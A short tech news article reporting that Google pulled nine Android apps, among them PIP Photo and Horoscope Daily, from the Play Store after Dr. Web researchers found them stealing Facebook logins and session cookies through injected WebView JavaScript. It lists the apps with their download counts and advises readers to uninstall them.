Google has removed nine popular Android apps from Play Store after they were caught stealing Facebook login details. The apps were stealing users’ data by using identical Javascript code.

All nine apps offered legal services and were downloaded more than 5.8 million times. Security researchers at Dr. Web have discovered these malicious apps and said they used a mechanism to trick the users to give their Facebook ID and passwords.

Google Removes Popular Apps from Play Store with 5.8 Million Downloads

Apps removed from Play Store (1)

The apps attracted users to disable the in-app ads by adding their Facebook profiles. When the user links their FB account, they see a form asking to enter their Facebook username and password. The form looks genuine, so the users fall for it. Once they enter the credentials, the page is loaded into Android WebView, which was legitimate.

The researchers discovered that the hackers loaded malicious JavaScript in the same WebView, to steal the data.

The researchers at Dr. Web says,

“This script was directly used to highjack the entered login credentials. After that, this JavaScript, using the methods provided through the JavascriptInterface annotation, passed stolen login and password to the trojan applications, which then transferred the data to the attackers’ C&C server. After the victim logged into their account, the trojans also stole cookies from the current authorization session. Those cookies were also sent to cybercriminals.”

Five malware variants were identified in the apps. From which three of them were Android apps, and the other two used Google’s Flutter framework. All of them are classified as same trojan because they have used similar configuration file formats and JavaScript code.

The apps that are now removed from Google Play Store are:

  1. PIP Photo (5,000,000+ downloads)
  2. Processing Photo (500,000+ downloads)
  3. Rubbish Cleaner (100,000+ downloads)
  4. Inwell Fitness (100,000+ downloads)
  5. Horoscope Daily (100,000+ downloads)
  6. App Lock Keep (50,000+ downloads)
  7. Lockit Master (5,000+ downloads)
  8. Horoscope Pi (1,000 downloads)
  9. App Lock manager (10 downloads)

All these apps are removed from the store and also banned the publishers of the apps, so they can’t publish new apps. If you have installed any app from the list, uninstall them right now.

LEAVE A REPLY

Please enter your comment!
Please enter your name here